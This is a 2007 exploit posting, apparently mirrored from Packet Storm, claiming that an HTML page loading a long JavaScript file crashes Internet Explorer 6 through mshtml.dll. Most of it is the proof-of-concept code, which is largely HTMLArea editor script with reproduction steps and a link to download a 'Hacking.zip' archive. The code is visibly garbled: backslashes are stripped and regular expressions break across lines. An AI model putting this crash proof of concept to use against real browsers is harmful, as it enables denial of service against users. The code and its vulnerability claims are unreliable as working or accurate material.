Home / vulnerabilities mshtmldll.txt
Posted on 21 March 2007
Source : packetstormsecurity.org Link
Microsoft Internet Explorer Multiple Vulnerabilities(mshtml.dll)
Discovered by:SaiedHacker
Company of Program:Microsoft
Tested On:Internet explorer 6.0.2900.2180
member of group:Siahacking,ArshamHacker,RHDS
to find how IE crached you shoud type this code into a HTML file and save that
<!-----------------------------------H@ckeranShiraz Security Team-----------------------!>
<!-- saved from url=(007)http://www.SaiedHackerPro.PersianBlog.com -->
<SCRIPT src="SaiedHacker.js" type=text/javascript></SCRIPT>
after typing these codes into a JS file:
_editor_url = "editor/";
if (typeof _editor_url == "string") {
_editor_url = _editor_url.replace(/x2f*$/, '/');
} else {
alert("WARNING: _editor_url is not set! You should set this variable to the editor files path; it should preferably be an absolute path, like in '/Saiedhacker', but it can be relative if you prefer. Further we will try to load the editor files correctly but we'll probably fail.");
}
if (typeof _editor_lang == "string") {
_editor_lang = _editor_lang.toLowerCase();
} else {
_editor_lang = "en";
}
function HTMLArea(textarea, config) {
if (HTMLArea.checkSupportedBrowser()) {
if (typeof config == "undefined") {
this.config = new HTMLArea.Config();
} else {
this.config = config;
}
this._htmlArea = null;
this._textArea = textarea;
this._editMode = "wysiwyg";
this.plugins = {};
this._timerToolbar = null;
this._timerUndo = setInterval(function() { if(config._doc) config._undoTakeSnapshot(); }, this.config.undoTimeout);
this._undoQueue = new Array();
this._undoPos = -1;
this._customUndo = true;
this._mdoc = document;
this.doctype = '';
}
};
(
function() {
var scripts = HTMLArea._scripts = [ _editor_url + "htmlarea.js",
_editor_url + "dialog.js",
_editor_url + "popupwin.js",
_editor_url + "lang/" + _editor_lang + ".js" ];
var head = document.getElementsByTagName("head")[0];
for (var i = 1; i < scripts.length; ++i) {
var script = document.createElement("script");
script.src = scripts[i];
head.appendChild(script);
}
}
)();
HTMLArea.RE_tagName = /(</|<)s*([^
>]+)/ig;
HTMLArea.RE_doctype = /(<!doctype((.|
)*?)>)
?/i;
HTMLArea.RE_head = /<head>((.|
)*?)</head>/i;
HTMLArea.RE_body = /<body>((.|
)*?)</body>/i;
HTMLArea.Config = function () {
this.version = "3.0";
this.width = "auto";
this.height = "auto";
this.statusBar = false;
this.undoSteps = 20;
this.undoTimeout = 500;
this.sizeIncludesToolbar = true;
this.fullPage = false;
this.pageStyle = "";
this.killWordOnPaste = false;
this.baseURL = document.baseURI || document.URL;
if (this.baseURL && this.baseURL.match(/(.*)/([^/]+)/))
this.baseURL = RegExp.$1 + "/";
this.imgURL = "images/";
this.popupURL = "popups/";
this.toolbar = [
[ "fontname", "space",
"fontsize", "space",
"formatblock", "space",
"bold", "italic", "underline", "strikethrough", "separator",
"subscript", "superscript", "separator",
"copy", "cut", "paste", "space", "undo", "redo" ],
[ "justifyleft", "justifycenter", "justifyright", "justifyfull", "separator",
"lefttoright", "righttoleft", "separator",
"insertorderedlist", "insertunorderedlist", "outdent", "indent", "separator",
"forecolor", "hilitecolor", "separator",
"inserthorizontalrule", "createlink", "insertimage", "inserttable", "htmlmode", "separator",
"popupeditor", "separator", "showhelp", "about" ]
];
this.fontname = {
"Arial": 'arial,helvetica,sans-serif',
"Courier New": 'courier new,courier,monospace',
"Georgia": 'georgia,times new roman,times,serif',
"Tahoma": 'tahoma,arial,helvetica,sans-serif',
"Times New Roman": 'times new roman,times,serif',
"Verdana": 'verdana,arial,helvetica,sans-serif',
"impact": 'impact',
"WingDings": 'wingdings'
};
this.fontsize = {
"1 (8 pt)": "1",
"2 (10 pt)": "2",
"3 (12 pt)": "3",
"4 (14 pt)": "4",
"5 (18 pt)": "5",
"6 (24 pt)": "6",
"7 (36 pt)": "7"
};
this.formatblock = {
"Heading 1": "h1",
"Heading 2": "h2",
"Heading 3": "h3",
"Heading 4": "h4",
"Heading 5": "h5",
"Heading 6": "h6",
"Normal": "p",
"Address": "address",
"Formatted": "pre"
};
this.customSelects = {};
function cut_copy_paste(e, cmd, obj) {
e.execCommand(cmd);
};
this.btnList = {
bold: [ "Bold", "ed_format_bold.gif", false, function(e) {e.execCommand("bold");} ],
italic: [ "Italic", "ed_format_italic.gif", false, function(e) {e.execCommand("italic");} ],
underline: [ "Underline", "ed_format_underline.gif", false, function(e) {e.execCommand("underline");} ],
strikethrough: [ "Strikethrough", "ed_format_strike.gif", false, function(e) {e.execCommand("strikethrough");} ],
justifyleft: [ "Justify Left", "ed_align_left.gif", false, function(e) {e.execCommand("justifyleft");} ],
justifycenter: [ "Justify Center", "ed_align_center.gif", false, function(e) {e.execCommand("justifycenter");} ],
justifyright: [ "Justify Right", "ed_align_right.gif", false, function(e) {e.execCommand("justifyright");} ],
justifyfull: [ "Justify Full", "ed_align_justify.gif", false, function(e) {e.execCommand("justifyfull");} ],
insertorderedlist: [ "Ordered List", "ed_list_num.gif", false, function(e) {e.execCommand("insertorderedlist");} ],
insertunorderedlist: [ "Bulleted List", "ed_list_bullet.gif", false, function(e) {e.execCommand("insertunorderedlist");} ],
outdent: [ "Decrease Indent", "ed_indent_more.gif", false, function(e) {e.execCommand("outdent");} ],
indent: [ "Increase Indent", "ed_indent_less.gif", false, function(e) {e.execCommand("indent");} ],
forecolor: [ "Font Color", "ed_color_fg.gif", false, function(e) {e.execCommand("forecolor");} ],
hilitecolor: [ "Background Color", "ed_color_bg.gif", false, function(e) {e.execCommand("hilitecolor");} ],
createlink: [ "Insert Web Link", "ed_link.gif", false, function(e) {e.execCommand("createlink", true);} ],
insertimage: [ "Insert/Modify Image", "ed_image.gif", false, function(e) {e.execCommand("insertimage");} ],
htmlmode: [ "Toggle HTML Source", "ed_html.gif", true, function(e) {e.execCommand("htmlmode");} ],
undo: [ "Undoes your last action", "ed_undo.gif", false, function(e) {e.execCommand("undo");} ],
redo: [ "Redoes your last action", "ed_redo.gif", false, function(e) {e.execCommand("redo");} ],
cut: [ "Cut selection", "ed_cut.gif", false, cut_copy_paste ],
copy: [ "Copy selection", "ed_copy.gif", false, cut_copy_paste ],
paste: [ "Paste from clipboard", "ed_paste.gif", false, cut_copy_paste ],
lefttoright: [ "Direction left to right", "ed_left_to_right.gif", false, function(e) {e.execCommand("lefttoright");} ],
smiley: [ "smiley", "ed_smiley.gif", false, function(e) {e.execCommand("smiley");} ],
save: [ "save", "ed_save.gif", false, function(e) {e.execCommand("save");} ],
lang: [ "language", "ed_en.gif", false, function(e) {e.execCommand("lang");} ],
righttoleft: [ "Direction right to left", "ed_right_to_left.gif", false, function(e) {e.execCommand("righttoleft");} ]
};
for (var i in this.btnList) {
var btn = this.btnList[i];
btn[1] = _editor_url + this.imgURL + btn[1];
if (typeof HTMLArea.I18N.tooltips[i] != "undefined") {
btn[0] = HTMLArea.I18N.tooltips[i];
}
}
};
finally when you run the html file you see that internet explorer cant run those codes and craches very fast. for downloading these codes you can go to http://www.freewebtown.com/saiedhacker/Hacking.zip
Have time of your life
HackeranShiraz Security Team
SaiedHackerIran@Yahoo.Com
www.SaiedHackerPro.PersianBlog.Com
---------------------------------
Get your own web address.
Have a HUGE year through Yahoo! Small Business.